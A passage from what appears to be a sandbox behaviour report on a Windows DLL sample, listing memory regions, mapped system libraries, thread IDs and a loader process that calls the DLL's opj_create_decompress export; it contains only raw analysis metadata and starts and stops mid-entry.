"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1989 start_va = 0x7ffc5ee90000 end_va = 0x7ffc5f2b8fff monitored = 0 entry_point = 0x7ffc5eeb8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1990 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1991 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1992 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1993 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2001 start_va = 0x5d20000 end_va = 0x5d2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2074 start_va = 0x5d30000 end_va = 0x5d3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2075 start_va = 0x5d40000 end_va = 0x5d4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2087 start_va = 0x5d20000 end_va = 0x5d2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2099 start_va = 0x5d50000 end_va = 0x5d70fff monitored = 0 entry_point = 0x5d52300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2100 start_va = 0x5d80000 end_va = 0x5dcefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d80000" filename = "" Region: id = 2101 start_va = 0x5d50000 end_va = 0x5d70fff monitored = 0 entry_point = 0x5d52300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2102 start_va = 0x5d50000 end_va = 0x5d70fff monitored = 0 entry_point = 0x5d52300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 2103 start_va = 0x5d30000 end_va = 0x5d31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d30000" filename = "" Region: id = 2106 start_va = 0x5900000 end_va = 0x5901fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005900000" filename = "" Region: id = 2107 start_va = 0x5910000 end_va = 0x5911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005910000" filename = "" Region: id = 2130 start_va = 0x5920000 end_va = 0x592ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2239 start_va = 0x5930000 end_va = 0x5931fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005930000" filename = "" Region: id = 2240 start_va = 0x5940000 end_va = 0x5941fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005940000" filename = "" Region: id = 2359 start_va = 0x5940000 end_va = 0x594ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 2360 start_va = 0x5950000 end_va = 0x595ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3221 start_va = 0x7a20000 end_va = 0x7b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a20000" filename = "" Region: id = 3222 start_va = 0x5960000 end_va = 0x596ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3720 start_va = 0x5970000 end_va = 0x597ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 3721 start_va = 0x5980000 end_va = 0x598ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 4143 start_va = 0x5910000 end_va = 0x591ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 4144 start_va = 0x5920000 end_va = 0x5921fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005920000" filename = "" Region: id = 4145 start_va = 0x5940000 end_va = 0x594ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 4218 start_va = 0x17c0000 end_va = 0x17c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 4220 start_va = 0x17c0000 end_va = 0x17c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 4221 start_va = 0x17c0000 end_va = 0x17c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 4337 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 4754 start_va = 0x7b20000 end_va = 0x7c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b20000" filename = "" Region: id = 6187 start_va = 0x7c20000 end_va = 0x7d1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c20000" filename = "" Region: id = 6203 start_va = 0x7d20000 end_va = 0x7e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d20000" filename = "" Region: id = 6346 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 6491 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 9164 start_va = 0x7e20000 end_va = 0x7f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e20000" filename = "" Region: id = 13010 start_va = 0x7f20000 end_va = 0x801ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f20000" filename = "" Region: id = 15688 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Thread: id = 45 os_tid = 0x11c8 Thread: id = 46 os_tid = 0x3f8 Thread: id = 47 os_tid = 0x5b4 Thread: id = 48 os_tid = 0x9a8 Thread: id = 49 os_tid = 0x5f0 Thread: id = 50 os_tid = 0x900 Thread: id = 51 os_tid = 0x1220 Thread: id = 52 os_tid = 0x1214 Thread: id = 53 os_tid = 0x11fc Thread: id = 54 os_tid = 0xf14 Thread: id = 55 os_tid = 0xe64 Thread: id = 56 os_tid = 0xe4c Thread: id = 57 os_tid = 0xba0 Thread: id = 58 os_tid = 0xc7c Thread: id = 59 os_tid = 0xb00 Thread: id = 60 os_tid = 0xadc Thread: id = 61 os_tid = 0xe3c Thread: id = 62 os_tid = 0xdd4 Thread: id = 63 os_tid = 0xda0 Thread: id = 64 os_tid = 0x91c Thread: id = 65 os_tid = 0x8dc Thread: id = 66 os_tid = 0x768 Thread: id = 67 os_tid = 0x5a4 Thread: id = 68 os_tid = 0xe24 Thread: id = 69 os_tid = 0x76c Thread: id = 70 os_tid = 0x7a4 Thread: id = 71 os_tid = 0x6d8 Thread: id = 72 os_tid = 0x52c Thread: id = 73 os_tid = 0x628 Thread: id = 74 os_tid = 0xb7c Thread: id = 75 os_tid = 0xd6c Thread: id = 76 os_tid = 0xccc Thread: id = 77 os_tid = 0xf18 Thread: id = 78 os_tid = 0x364 Thread: id = 79 os_tid = 0x444 Thread: id = 80 os_tid = 0xca0 Thread: id = 81 os_tid = 0xc68 Thread: id = 82 os_tid = 0xc34 Thread: id = 83 os_tid = 0xc24 Thread: id = 84 os_tid = 0xc08 Thread: id = 85 os_tid = 0x5f4 Thread: id = 86 os_tid = 0xa0c Thread: id = 87 os_tid = 0x970 Thread: id = 88 os_tid = 0xfdc Thread: id = 89 os_tid = 0xfd8 Thread: id = 90 os_tid = 0xfd0 Thread: id = 91 os_tid = 0xfb0 Thread: id = 92 os_tid = 0xfa8 Thread: id = 93 os_tid = 0xf80 Thread: id = 94 os_tid = 0xc64 Thread: id = 95 os_tid = 0xb4c Thread: id = 96 os_tid = 0x9fc Thread: id = 97 os_tid = 0x9d8 Thread: id = 98 os_tid = 0x9b4 Thread: id = 99 os_tid = 0x9ac Thread: id = 100 os_tid = 0x9a4 Thread: id = 101 os_tid = 0x950 Thread: id = 102 os_tid = 0x94c Thread: id = 103 os_tid = 0x948 Thread: id = 104 os_tid = 0x93c Thread: id = 105 os_tid = 0x928 Thread: id = 106 os_tid = 0x8f8 Thread: id = 107 os_tid = 0x8f4 Thread: id = 108 os_tid = 0x8c4 Thread: id = 109 os_tid = 0x8b0 Thread: id = 110 os_tid = 0x894 Thread: id = 111 os_tid = 0x888 Thread: id = 112 os_tid = 0x87c Thread: id = 113 os_tid = 0x86c Thread: id = 114 os_tid = 0x840 Thread: id = 115 os_tid = 0x4f4 Thread: id = 116 os_tid = 0x464 Thread: id = 117 os_tid = 0x4d0 Thread: id = 118 os_tid = 0x420 Thread: id = 119 os_tid = 0x7c0 Thread: id = 120 os_tid = 0x608 Thread: id = 121 os_tid = 0x4f8 Thread: id = 122 os_tid = 0x49c Thread: id = 123 os_tid = 0x2ac Thread: id = 124 os_tid = 0x1b4 Thread: id = 125 os_tid = 0x1b8 Thread: id = 126 os_tid = 0x1cc Thread: id = 127 os_tid = 0x16c Thread: id = 128 os_tid = 0x190 Thread: id = 129 os_tid = 0x3fc Thread: id = 130 os_tid = 0x3f4 Thread: id = 131 os_tid = 0x3e8 Thread: id = 132 os_tid = 0x3e4 Thread: id = 133 os_tid = 0x3d0 Thread: id = 134 os_tid = 0x3cc Thread: id = 135 os_tid = 0x348 Thread: id = 171 os_tid = 0x41c Thread: id = 187 os_tid = 0x1250 Thread: id = 195 os_tid = 0xa14 Thread: id = 196 os_tid = 0x650 Thread: id = 215 os_tid = 0x428 Thread: id = 223 os_tid = 0xda8 Process: id = "14" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x681a000" os_pid = "0x11a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2009 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2010 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2011 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2012 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 2013 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 2014 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2015 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2016 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2017 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 2018 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 2019 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2021 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2022 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2023 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2024 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2025 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 2026 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2027 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2028 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2030 start_va = 0x620000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2031 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2032 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2033 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2034 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2035 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2036 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2037 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2038 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2039 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2040 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2041 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2042 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2043 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2044 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2045 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2046 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2047 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2048 start_va = 0x720000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 2049 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2050 start_va = 0x8b0000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2051 start_va = 0xa40000 end_va = 0x1e3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 2052 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2053 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2054 start_va = 0x1e40000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 2055 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 2056 start_va = 0x1e40000 end_va = 0x1efffff monitored = 0 entry_point = 0x1e60da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2057 start_va = 0x2000000 end_va = 0x200ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 2059 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 2063 start_va = 0x1e40000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 2064 start_va = 0x2010000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 2068 start_va = 0x2210000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 2069 start_va = 0x2610000 end_va = 0x2e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 2073 start_va = 0x2e10000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 2108 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 2120 start_va = 0x3de0000 end_va = 0x4116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2176 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2177 start_va = 0x4120000 end_va = 0x43abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2192 start_va = 0x4120000 end_va = 0x4266fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2194 start_va = 0x4120000 end_va = 0x42e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3165 start_va = 0x4120000 end_va = 0x56b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3538 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3539 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3540 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3541 start_va = 0x4120000 end_va = 0x42ebfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3542 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3543 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3544 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3546 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3548 start_va = 0x4120000 end_va = 0x4284fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 3549 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3550 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3551 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3552 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3553 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3554 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3555 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 